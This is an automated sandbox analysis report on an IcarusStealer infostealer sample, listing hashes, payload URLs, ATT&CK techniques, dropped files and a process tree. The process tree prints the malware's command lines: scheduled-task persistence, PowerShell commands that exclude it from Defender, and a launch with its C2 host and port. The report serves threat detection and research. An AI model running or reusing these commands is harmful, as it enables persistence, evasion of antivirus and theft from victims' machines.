icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
14/03/2024, 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom1.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 6 IoCs

pid	Process
2700	Client.exe
2996	switched.exe
2640	pulse x loader.exe
2624	tesetey.exe
804	YourPhone.exe
604	$SXR.exe

Loads dropped DLL 6 IoCs

pid	Process
2084	custom1.exe
2084	custom1.exe
2996	switched.exe
2996	switched.exe
2472	cmd.exe
1456	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
16	raw.githubusercontent.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\Read.txt	$SXR.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2624 set thread context of 1032	2624	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2680	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1836	timeout.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tesetey.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tesetey.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2624	tesetey.exe
804	YourPhone.exe
616	powershell.exe
1256	powershell.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
2700	Client.exe
2700	Client.exe
2700	Client.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe
804	YourPhone.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2624	tesetey.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeDebugPrivilege	1032	cvtres.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeDebugPrivilege	804	YourPhone.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeDebugPrivilege	2700	Client.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeDebugPrivilege	604	$SXR.exe
Token: SeDebugPrivilege	604	$SXR.exe
Token: SeShutdownPrivilege	108	explorer.exe
Token: SeShutdownPrivilege	108	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe
108	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2084 wrote to memory of 2700	2084	custom1.exe	28
PID 2084 wrote to memory of 2700	2084	custom1.exe	28
PID 2084 wrote to memory of 2700	2084	custom1.exe	28
PID 2084 wrote to memory of 2700	2084	custom1.exe	28
PID 2084 wrote to memory of 2996	2084	custom1.exe	29
PID 2084 wrote to memory of 2996	2084	custom1.exe	29
PID 2084 wrote to memory of 2996	2084	custom1.exe	29
PID 2084 wrote to memory of 2996	2084	custom1.exe	29
PID 2996 wrote to memory of 2640	2996	switched.exe	30
PID 2996 wrote to memory of 2640	2996	switched.exe	30
PID 2996 wrote to memory of 2640	2996	switched.exe	30
PID 2996 wrote to memory of 2640	2996	switched.exe	30
PID 2996 wrote to memory of 2624	2996	switched.exe	31
PID 2996 wrote to memory of 2624	2996	switched.exe	31
PID 2996 wrote to memory of 2624	2996	switched.exe	31
PID 2996 wrote to memory of 2624	2996	switched.exe	31
PID 2640 wrote to memory of 2760	2640	pulse x loader.exe	33
PID 2640 wrote to memory of 2760	2640	pulse x loader.exe	33
PID 2640 wrote to memory of 2760	2640	pulse x loader.exe	33
PID 2760 wrote to memory of 2608	2760	cmd.exe	35
PID 2760 wrote to memory of 2608	2760	cmd.exe	35
PID 2760 wrote to memory of 2608	2760	cmd.exe	35
PID 2760 wrote to memory of 2580	2760	cmd.exe	36
PID 2760 wrote to memory of 2580	2760	cmd.exe	36
PID 2760 wrote to memory of 2580	2760	cmd.exe	36
PID 2760 wrote to memory of 2448	2760	cmd.exe	37
PID 2760 wrote to memory of 2448	2760	cmd.exe	37
PID 2760 wrote to memory of 2448	2760	cmd.exe	37
PID 2624 wrote to memory of 2480	2624	tesetey.exe	38
PID 2624 wrote to memory of 2480	2624	tesetey.exe	38
PID 2624 wrote to memory of 2480	2624	tesetey.exe	38
PID 2624 wrote to memory of 2480	2624	tesetey.exe	38
PID 2480 wrote to memory of 2916	2480	csc.exe	39
PID 2480 wrote to memory of 2916	2480	csc.exe	39
PID 2480 wrote to memory of 2916	2480	csc.exe	39
PID 2480 wrote to memory of 2916	2480	csc.exe	39
PID 2624 wrote to memory of 108	2624	tesetey.exe	40
PID 2624 wrote to memory of 108	2624	tesetey.exe	40
PID 2624 wrote to memory of 108	2624	tesetey.exe	40
PID 2624 wrote to memory of 108	2624	tesetey.exe	40
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 2472	2624	tesetey.exe	42
PID 2624 wrote to memory of 2472	2624	tesetey.exe	42
PID 2624 wrote to memory of 2472	2624	tesetey.exe	42
PID 2624 wrote to memory of 2472	2624	tesetey.exe	42
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 108 wrote to memory of 2768	108	explorer.exe	44
PID 108 wrote to memory of 2768	108	explorer.exe	44
PID 108 wrote to memory of 2768	108	explorer.exe	44
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 2472 wrote to memory of 804	2472	cmd.exe	45
PID 2472 wrote to memory of 804	2472	cmd.exe	45
PID 2472 wrote to memory of 804	2472	cmd.exe	45
PID 2472 wrote to memory of 804	2472	cmd.exe	45
PID 2624 wrote to memory of 1032	2624	tesetey.exe	41
PID 1032 wrote to memory of 1500	1032	cvtres.exe	46
PID 1032 wrote to memory of 1500	1032	cvtres.exe	46
PID 1032 wrote to memory of 1500	1032	cvtres.exe	46
PID 1032 wrote to memory of 1500	1032	cvtres.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2084
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:1152
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:1456
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1836
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:604
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2996
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2760
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2608
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2580
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2448
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2480
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE43.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP"
        5⤵
        
        PID:2916
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:108
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2768
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:1500
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:1600
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:616
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2472
    - - C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
        
        C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
15.5MB

MD5
9da00b6427a91d73de0f7b20df26b849

SHA1
724a547b8e4edc340c2ae53a15f3ed156d44287f

SHA256
ea298f0bdc32ef49b4ebe551276ff229079bc78b216bd8df8879dfdb8b01edcd

SHA512
10532d4e04ffbeaf6767398208df5f7b75470590e2eb35a551b3c6cf06c24d67bd382e59f929be7cf8d1c5e94089d4979b9bff8b833b2bb6a2a7bb73f9afdb7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
16.4MB

MD5
2f3e6e8955ea526e9dda7ab10414840f

SHA1
0027f0db042ecb3d6c59e4b7ff2a605cda38ffb5

SHA256
25f1407aa290e3a2a90eec56dc6c531fb13a7e43bd9a33016c7f677a6447923b

SHA512
98a4c6dc610c891be99889595e098f05d8f79c8fc0f1691d0a2a35efd4656f13b3a78f73576ac3e1e20676ceefcb6216dd3cbde934eeef7fee23d591a1b74173

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE43.tmp

Filesize
1KB

MD5
c1187374035c9c044ef03a6cac62d2e8

SHA1
b5ad05e6966e248207af70f51fa076b3f19ce4e2

SHA256
1e112fe7d3103f685b5b059b05e688289a0acc3d50473eb91dd3fe567ad45ca0

SHA512
105463bd65b3c274c1d38583b1d9c68fb87e02ee575190346fb71f278f1dfc241fc6e880291f6cf66a520951e4c10ec408071a0437bb8f03c31ddf72eb5c7f2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

Filesize
4KB

MD5
5c13f91965d83fb112657fce83f48802

SHA1
0cbde19c106427cc4edd6a2423cd79b30764632d

SHA256
d61ad762cbe5d931208412f2e825c486b0e7cf7b0e5278f0ad86fc60dc6d1477

SHA512
ba2773a39fb0b54847c745fc425f80feccad5af0e0fadcda2c7f9eb327756434356ef86c38b067de837fc7e3da785101cc3f7caad5c107820b3eea75bb4637c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
3.2MB

MD5
ceb8c3c0f2249f05f3df8f88d46ae743

SHA1
651675ba157c085ce64aa5bb2abbfd6f5efc75c6

SHA256
a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778

SHA512
872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2156.tmp.bat

Filesize
150B

MD5
01965b3e40047eadca92b1344a4d1ba8

SHA1
dab8c443348f3f9e8df0994ed38a8e9ba74690c0

SHA256
33b88d16bba3c6acc31d0c70fcf08e5721039c64e49b68178b9bfed48d9ced96

SHA512
bd2cb6a7ca2af430df74d5deb9f6aa193b68f747a6c029e1549d79cc9b5637bea6463027f950604de3aefba52ebd8763611723be9cde5cf671e261716057355e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\63QG9ZJUK59TQIGBF1C6.temp

Filesize
7KB

MD5
e5cd928526289a221212a39a5a8abb24

SHA1
5bd1e28c75e0e5f66eada1cd9fa5da7382dbc2cb

SHA256
4196635fd53050d3229f1299a3034b015b4274c474b953bd7b9de31f7ba9bfa0

SHA512
ac46fe719e601468ff0a5527ad071a92f8c03669513d9e5d2ecef9a143768fee1e92652d64c9c2fc9a008c04877f71a619616eb946a3fe04c48b1d380bab9885

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
2.4MB

MD5
899b39e1c1dc74440135ff584160cced

SHA1
673bd63287f722db94f64e77b72661cf38a35353

SHA256
3bdc087d9c937d6c51baf06d01b4107a0a62cd94a53c3ac7a43bbcedfb776403

SHA512
71c070262b0433890c0553ab7613418af37ac3390e5771372852dacfc5ec6b7de8880e7b76e24a5e517711cb9ae01123800a6171ce9fe36eda00452119510a3e

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
2.1MB

MD5
30111650408e0c92181d4fd8aedf75bf

SHA1
c372699a0023f2320fbabc9f0fc10c4d88213b50

SHA256
eb8fb3cce486be08859bb996b81bdeb037602601400dcfcc28fe69db5c4af8f4

SHA512
0d9f8e68c7ddc97941fd5fd4951d439cbfd0cf434b3814ac0ee8aff3a066da617320a6c96e41478c50d4ce96fa3d7c44af40e98e89982d3f2672eb6c996cd5b3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
13.2MB

MD5
4bd5a0408b3ce5efe4d2aad0c141154d

SHA1
64cfb6af044f175ec76176d284e66f24c4063e6c

SHA256
663b90b0a72843dddc51e070fcb7b2ab26f56cc2e86ef9b832604a271dff411a

SHA512
6ab297fd299023c80a7568b8bd74230022c024b6ebdd0e2abf84d036c6f967c6027e5646962475cfb9e8ff5306cb83e0c892ad39816be00f839b398a9415dbb0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCD620E4CA7FE54156A29ED1C9529AF5DF.TMP

Filesize
1KB

MD5
1d5543c367c49b9dd6366270fdd4ee3a

SHA1
bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

SHA256
502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

SHA512
86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.0.cs

Filesize
1KB

MD5
14846c9faaef9299a1bf17730f20e4e6

SHA1
8083da995cfaa0e8e469780e32fcff1747850eb6

SHA256
61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

SHA512
549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\p2cglymc\p2cglymc.cmdline

Filesize
451B

MD5
80a1cd1a299b50a00281726b2a5f1295

SHA1
b19f6469acfd5f7c09ed93cf0e653e1b6f0c6428

SHA256
30b41329ac56ec4c179b8c2101a6c2b0db0a3b00843afcd54670aab4de64674c

SHA512
c7b4b5fc819fe3962762631f2675db7cf0b78994b6e29ce706eade107f21e834f5a4c5abc4c5e197b4bd42f0171b679fb02f5d22df874bf0422f82d0a4f4f510

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
15.9MB

MD5
41bb20a321d77b2bdf96ba74783feca8

SHA1
61eac12659e5141463acdc36b3b42bb12e32a18c

SHA256
80b30d39834f87a48c64f252a706d4a107ee3b83df3d5bc440fe303af4ffd529

SHA512
b3ae8cfda4b66e18202645aad37204f742c20ff2fb89cd84b8ad7cd6c728f4cc2d621d77d34b6acc556f27bd9c969aef979a0e37e9be70c1d4b62da73dad5923

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.7MB

MD5
b9bbe31d276de5c3d05352d070ae4244

SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

Download Submit
\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
1.3MB

MD5
95ca16db3c6ffe18f678246226235a32

SHA1
d358bdaa55d5878fa90d8272ec3676116e85018a

SHA256
dbcb6bff7d4bab19d17321cf41e8359ea6e2ef13498bf6c98bc72f7614ff22ad

SHA512
e41a6ea1e007423586ef194c80b07fc6d4c0b113a3d6740ba6e1b9dcbf18ae9784dc899e153d7a6f9c74251624a713fb63fd1cb70f3a64594bd00b90e74a0bca

Download Submit
memory/108-112-0x0000000003E90000-0x0000000003E91000-memory.dmp

Filesize
4KB

Download
